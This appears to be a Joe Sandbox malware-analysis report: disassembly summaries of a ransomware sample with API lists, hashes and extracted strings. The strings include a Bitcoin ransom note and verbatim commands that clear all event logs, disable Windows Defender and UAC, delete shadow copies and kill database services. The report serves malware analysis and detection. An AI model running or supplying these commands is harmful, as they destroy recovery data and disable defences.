call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8b5330 2794->2799 2800 8dec20-8dec31 call 8e98b0 2794->2800 2994 8de879-8debee call 8b5130 * 2 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8b5330 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8b5330 2799->2994 2995 8dec04 2799->2995 2812 8dec61 2800->2812 2813 8dec33-8dec48 call 8ce2e0 * 2 2800->2813 2906 8de489-8de4d0 call 8ea480 call 8e19a0 call 8b49c0 call 8e1860 * 2 call 9661d6 2802->2906 2907 8de4d3-8de4e2 call 8b49c0 2802->2907 2818 8dec61 call 8cfd50 2812->2818 2813->2801 2839 8dec4a-8dec5f call 8ce2e0 * 2 2813->2839 2823 8dec66-8dec6d 2818->2823 2823->2801 2829 8dec6f 2823->2829 2829->2801 2834 8dec6f call 8cfd50 2829->2834 2834->2801 2839->2801 2906->2907 2907->2801 3088 8debf4 call 8b5240 2994->3088 2996 8dec0a call 8b5240 2995->2996 2998 8dec0f-8dec15 2996->2998 3000 8dec19 call 8b5240 2998->3000 3002 8dec1e 3000->3002 3002->2801 3089 8debf9 3088->3089 3090 8debff call 8b5240 3089->3090 3090->2995
                                      APIs
                                        • Part of subcall function 008BB0A0: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008BB147
                                        • Part of subcall function 008BAE70: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008BAEE1
                                      • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 008DE06E
                                        • Part of subcall function 009661D6: MoveFileExW.KERNEL32(?,?,00000002), ref: 009661E3
                                        • Part of subcall function 009661D6: GetLastError.KERNEL32 ref: 009661ED
                                        • Part of subcall function 009661D6: __dosmaperr.LIBCMT ref: 009661F4
                                      Strings
                                      • _Mail-, xrefs: 008DE3C7
                                      • Telegram , ID :, xrefs: 008DE063
                                      • <span class="spnn">, xrefs: 008DE123
                                      • Dflt, xrefs: 008DE36D
                                      • file, xrefs: 008DE368
                                      • u4g8, xrefs: 008DDD11
                                      • for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1", xrefs: 008DEC74
                                      • 77H75, xrefs: 008DE0A4, 008DE238, 008DE3AE
                                      • c, xrefs: 008DE4D9
                                      • n7t0, xrefs: 008DDB76, 008DDC3E
                                      • c, xrefs: 008DE35F
                                      • All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without , xrefs: 008DE23D
                                      • U, xrefs: 008DDEB8
                                      • </span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our , xrefs: 008DE0EF
                                      • </title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou, xrefs: 008DE08B
                                      • .1UI, xrefs: 008DDCB5, 008DDCC2, 008DE412
                                      • _[ID-, xrefs: 008DE396
                                      • <html><head><title>, xrefs: 008DE078
                                      • To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp, xrefs: 008DE2EC
                                      • Z0, xrefs: 008DD9A1
                                      • :\Users\, xrefs: 008DDDBD
                                      • If You Do Not Receive A Response Within 24 Hours, Send A Message To Our , xrefs: 008DE282
                                      • If You Want To Restore Them Email Us : , xrefs: 008DE250
                                      • taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk, xrefs: 008DE219
                                      • Second Email :, xrefs: 008DE039
                                      • </span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The , xrefs: 008DE155
                                      • p2h6, xrefs: 008DDB89, 008DDC51
                                      • \AppData\N-Save.sys, xrefs: 008DDDF2
                                      • </span></br></br>If You Want To Restore Them Email Us : <span class="spnn">, xrefs: 008DE0BD
                                      • reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic, xrefs: 008DE1EB
                                      • h2gq, xrefs: 008DDD4E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Ios_base_dtorstd::ios_base::_$ErrorFileLastMoveSimpleString::operator=__dosmaperr
                                      • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ <span class="spnn">$.1UI$77H75$:\Users\$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$Second Email :$Telegram , ID :$U$\AppData\N-Save.sys$_Mail-$_[ID-$c$c$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$h2gq$n7t0$p2h6$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$u4g8$Z0
                                      • API String ID: 4082941153-1248798851
                                      • Opcode ID: bfde7d9006ff46d160e4adf6b80b796820c6a8af1516d7b331582a9a5fdc09ce
                                      • Instruction ID: 8b1973052468d9b2dcc61a65fa0d8f337367d212376671eb3b3d04a8e9da4cf1
                                      • Opcode Fuzzy Hash: bfde7d9006ff46d160e4adf6b80b796820c6a8af1516d7b331582a9a5fdc09ce
                                      • Instruction Fuzzy Hash: 91728470D142989ADB14E768DD56BEDB7B8FF51304F4080E8A149A7292EF706F88CB53
                                      Function 008B8D10 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 391networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3851 8b8d10-8b8ea6 call 941f40 call 9291f6 call 8e9750 call 8e2110 call 8e9f30 call 8e2110 3864 8b8ea8-8b8eb7 3851->3864 3865 8b8ee6-8b8f1d 3851->3865 3866 8b8eb9-8b8ec7 3864->3866 3867 8b8ecd-8b8ede call 94143c 3864->3867 3868 8b8f1f-8b8f2e 3865->3868 3869 8b8f4e-8b8f76 3865->3869 3866->3867 3872 8b92f1 call 965942 3866->3872 3867->3865 3874 8b8f30-8b8f3e 3868->3874 3875 8b8f44-8b8f4b call 94143c 3868->3875 3870 8b8f78-8b8f87 3869->3870 3871 8b8fa7-8b8fcf 3869->3871 3877 8b8f89-8b8f97 3870->3877 3878 8b8f9d-8b8fa4 call 94143c 3870->3878 3880 8b8fd1-8b8fe0 3871->3880 3881 8b9000-8b901c 3871->3881 3885 8b92f6-8b92fb call 965942 3872->3885 3874->3872 3874->3875 3875->3869 3877->3872 3877->3878 3878->3871 3887 8b8fe2-8b8ff0 3880->3887 3888 8b8ff6-8b8ffd call 94143c 3880->3888 3883 8b9023-8b902c 3881->3883 3883->3883 3889 8b902e-8b90bc WSAStartup socket gethostbyname htons connect 3883->3889 3887->3872 3887->3888 3888->3881 3893 8b90be-8b90c4 3889->3893 3894 8b90c6-8b90cf call 8e1fd0 3889->3894 3893->3894 3897 8b90d4-8b90ef 3893->3897 3894->3897 3899 8b90f5-8b90fa 3897->3899 3899->3899 3900 8b90fc-8b9121 send 3899->3900 3901 8b91cd-8b91df closesocket WSACleanup 3900->3901 3902 8b9127-8b914c call 8e1fd0 recv 3900->3902 3903 8b91e5-8b91ee 3901->3903 3902->3901 3909 8b9152 3902->3909 3903->3903 3905 8b91f0-8b91f9 3903->3905 3907 8b91fb-8b920a 3905->3907 3908 8b922a-8b924d 3905->3908 3912 8b920c-8b921a 3907->3912 3913 8b9220-8b9227 call 94143c 3907->3913 3910 8b924f-8b925a 3908->3910 3911 8b9262-8b9268 3908->3911 3914 8b9158-8b915c 3909->3914 3910->3911 3932 8b925c-8b925e 3910->3932 3915 8b926a-8b9276 3911->3915 3916 8b9292-8b92aa 3911->3916 3912->3885 3912->3913 3913->3908 3918 8b915e-8b9160 3914->3918 3919 8b9166-8b9172 3914->3919 3923 8b9288-8b928f call 94143c 3915->3923 3924 8b9278-8b9286 3915->3924 3925 8b92ac-8b92b8 3916->3925 3926 8b92d4-8b92f0 call 940dbb 3916->3926 3918->3919 3928 8b9162-8b9164 3918->3928 3920 8b918f-8b91ac call 8ec270 3919->3920 3921 8b9174-8b9180 3919->3921 3920->3914 3929 8b9182 3921->3929 3930 8b9184-8b918d 3921->3930 3923->3916 3924->3885 3924->3923 3935 8b92ca-8b92d1 call 94143c 3925->3935 3936 8b92ba-8b92c8 3925->3936 3928->3919 3937 8b91ae-8b91cb recv 3928->3937 3929->3930 3930->3914 3932->3911 3935->3926 3936->3885 3936->3935 3937->3901 3937->3909
                                      APIs
                                      • std::locale::_Init.LIBCPMT ref: 008B8D8C
                                        • Part of subcall function 009291F6: __EH_prolog3.LIBCMT ref: 009291FD
                                        • Part of subcall function 009291F6: std::_Lockit::_Lockit.LIBCPMT ref: 00929208
                                        • Part of subcall function 009291F6: std::locale::_Setgloballocale.LIBCPMT ref: 00929223
                                        • Part of subcall function 009291F6: std::_Lockit::~_Lockit.LIBCPMT ref: 00929279
                                      • WSAStartup.WS2_32(00000202,?), ref: 008B903A
                                      • socket.WS2_32(00000002,00000001,00000006), ref: 008B905A
                                      • gethostbyname.WS2_32(?), ref: 008B9072
                                      • htons.WS2_32(00000E02), ref: 008B907F
                                      • connect.WS2_32(?,?,00000010), ref: 008B90B4
                                      • send.WS2_32(?,?,?,00000000), ref: 008B9119
                                      • recv.WS2_32(?,?,00002710,00000000), ref: 008B9144
                                      • recv.WS2_32(?,?,00002710,00000000), ref: 008B91C3
                                      • closesocket.WS2_32(?), ref: 008B91CE
                                      • WSACleanup.WS2_32 ref: 008B91D4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Lockitrecvstd::_std::locale::_$CleanupH_prolog3InitLockit::_Lockit::~_SetgloballocaleStartupclosesocketconnectgethostbynamehtonssendsocket
                                      • String ID: Connection: close$ HTTP/1.1Host: $GET /$off
                                      • API String ID: 928259667-845956351
                                      • Opcode ID: 78ec4f81f94459327d6650d5cb2ddba421b12cf3133451cabf9978eaf08f660c
                                      • Instruction ID: 3b34b4f34920b18cf5b26752915ce23df35df9bcd7cb1dbece73cb3158322067
                                      • Opcode Fuzzy Hash: 78ec4f81f94459327d6650d5cb2ddba421b12cf3133451cabf9978eaf08f660c
                                      • Instruction Fuzzy Hash: 2AF1BE30A052599BEB29CF28CD48BADBBB5FF45304F0081D9E548AB392DB759BC48F51
                                      Function 008C4E20 Relevance: 20.4, APIs: 5, Strings: 6, Instructions: 1181COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowTextLengthA.USER32(?), ref: 008C5AD7
                                      • GetWindowTextA.USER32(?,00000000,00000001), ref: 008C5BA9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: TextWindow$Length
                                      • String ID: !$P$asykat$asykat$k2ba8v$r1d8la
                                      • API String ID: 1006428111-138844214
                                      • Opcode ID: d2e18e2df9870bd1eb304f8b4e98da0ae13ae4719c48a352dae662c699996051
                                      • Instruction ID: e602a3f3c8c8fa6887da75e5a49ec2b88545185e5983ea8178b2528ccb83e3c2
                                      • Opcode Fuzzy Hash: d2e18e2df9870bd1eb304f8b4e98da0ae13ae4719c48a352dae662c699996051
                                      • Instruction Fuzzy Hash: 6DA2AF70A106589BEF24DF68CC95BADBBB1FB85304F10829DE409E7291DB74AAC4CF51
                                      Function 00914A30 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123encryptionCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,BA3649C5,009D9528,?,00000000), ref: 00914A75
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0098D0C8,000000FF,?,00915170), ref: 00914A7B
                                      • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 00914A8F
                                      • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 00914AA0
                                      • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,0098D0C8,000000FF), ref: 00914AC5
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00914AF4
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00914B42
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: AcquireContextCrypt$ErrorLast$Exception@8Throw___std_exception_copy
                                      • String ID: CryptAcquireContext$Crypto++ RNG
                                      • API String ID: 636621833-1159690233
                                      • Opcode ID: 6a100d52a251a2b5164faf5f25d5ca36b26edd10bbea4627a7c55b2a07d7872e
                                      • Instruction ID: 449d0653246eac965026e7f1b33a91084158aa0d251c8ae6785128ebdef78292
                                      • Opcode Fuzzy Hash: 6a100d52a251a2b5164faf5f25d5ca36b26edd10bbea4627a7c55b2a07d7872e
                                      • Instruction Fuzzy Hash: 60417171A54709ABDB10DF99DC41F9AB7ECFB48710F10462AF515E7280EBB4A5048B64
                                      Function 008C4CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111COMMON
                                      Download Yara Rule
                                      APIs
                                      • NetUserEnum.NETAPI32(00000000,00000000,00000002,00000000,000000FF,00000000,?,?,BA3649C5), ref: 008C4D25
                                      • NetApiBufferFree.NETAPI32(00000000), ref: 008C4DC6
                                      • NetApiBufferFree.NETAPI32(00000000), ref: 008C4DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: BufferFree$EnumUser
                                      • String ID: Default
                                      • API String ID: 2592758740-753088835
                                      • Opcode ID: 211a1539bba17f921c27b51855768cf828580b4911b397bcb4768f0b611a0dba
                                      • Instruction ID: 6d91931ff8eb55107ca84668768c4fe6b1527badfccaeb96237801954068f7a7
                                      • Opcode Fuzzy Hash: 211a1539bba17f921c27b51855768cf828580b4911b397bcb4768f0b611a0dba
                                      • Instruction Fuzzy Hash: FE416F75D142099BCB14DF98D894FEEBBB8FB48314F14522EE912A7290D735AA44CB90
                                      Function 00915100 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91encryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptGenRandom.ADVAPI32(00000000,?,00000000,00000001), ref: 00915180
                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0091519F
                                        • Part of subcall function 00914B90: GetLastError.KERNEL32(00000010,BA3649C5,75B4FC30,?), ref: 00914BE0
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0091520A
                                        • Part of subcall function 00958621: RaiseException.KERNEL32(?,?,00925B8C,?,?,Dflt,?,?,?,?,?,00925B8C,?,009C9A70,?), ref: 00958681
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Crypt$ContextErrorExceptionException@8LastRaiseRandomReleaseThrow
                                      • String ID: CryptGenRandom
                                      • API String ID: 1600773198-3616286655
                                      • Opcode ID: 6b572952fcda7a0ecd32e76a16e4515d55abd7037d64bbfb7c0ffe416e386641
                                      • Instruction ID: fbf995f01fe08ba4908ebd3ffbe84443b2c957f673a1ca536b462ce1b4c2be4c
                                      • Opcode Fuzzy Hash: 6b572952fcda7a0ecd32e76a16e4515d55abd7037d64bbfb7c0ffe416e386641
                                      • Instruction Fuzzy Hash: CC319EB1A0424CEFDF11DFA4D845BEEBBB8EF45314F100129E815AB281DB709A08CB61
                                      Function 008C60E0 Relevance: 6.2, APIs: 4, Instructions: 164networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PathIsNetworkPathA.SHLWAPI(?,009AAB14,?,?,?,BA3649C5), ref: 008C6167
                                      • __alloca_probe_16.LIBCMT ref: 008C6197
                                      • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,?,?,?,?,?,BA3649C5), ref: 008C61B1
                                      • GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,BA3649C5), ref: 008C61CC
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Path$ByteCharDiskFreeMultiNetworkSpaceWide__alloca_probe_16
                                      • String ID:
                                      • API String ID: 592574438-0
                                      • Opcode ID: 382f2657ddcfb682acafe525cb464102ea91adb0aa1a8dc6e037981e0a1960e6
                                      • Instruction ID: bcd15c254778f11d99f84a8578766e1376a1a0fadf1d2f4b59c0ce51759ec8ae
                                      • Opcode Fuzzy Hash: 382f2657ddcfb682acafe525cb464102ea91adb0aa1a8dc6e037981e0a1960e6
                                      • Instruction Fuzzy Hash: 10519D31A042199FDB14CFA8C881FAEB7B9FF85310F18822EE801D7291E731ED558B60
                                      Function 008C3EB0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?), ref: 008C3EF3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID: engineer
                                      • API String ID: 2645101109-2484562649
                                      • Opcode ID: bac71a43460cbc3b9187df7e819a68a8d48490679b3188bc625b8ca01375e53c
                                      • Instruction ID: cca6ee5cf4f3b0ba33a77455afdf6b881222ee18537074339f66193d95c5ffa5
                                      • Opcode Fuzzy Hash: bac71a43460cbc3b9187df7e819a68a8d48490679b3188bc625b8ca01375e53c
                                      • Instruction Fuzzy Hash: 91418C7195011CABCB24DB68DC98BDEB7B5FB48310F6042D9E009A7290DB38ABC4CF90
                                      Function 00916AEB Relevance: 2.3, Strings: 1, Instructions: 1005COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 6bbf8f2b8c2657e4eb3a4b76697824776381fbd7f8aeba6fc0a65bdc62c6d286
                                      • Instruction ID: 536c8df6c3aec22e6fb8afcaae2cbc60e3cac08c96280acfb481885dcfd4ae7d
                                      • Opcode Fuzzy Hash: 6bbf8f2b8c2657e4eb3a4b76697824776381fbd7f8aeba6fc0a65bdc62c6d286
                                      • Instruction Fuzzy Hash: D5A26974A14118DFCB18CF98D4A0ABDB7F1FB49310F21448EE596AB392C635AE91EF50
                                      Function 00914FF0 Relevance: 1.6, APIs: 1, Instructions: 81encryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0091507A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ContextCryptRelease
                                      • String ID:
                                      • API String ID: 829835001-0
                                      • Opcode ID: 069e78711299a6452f6ddc996f2261258309ff6267bc8c6057729f458811478d
                                      • Instruction ID: 205db3bff3f7d917d97b9f5927275db8a82f4e55bf0fa4c3e51b35db4ce0671e
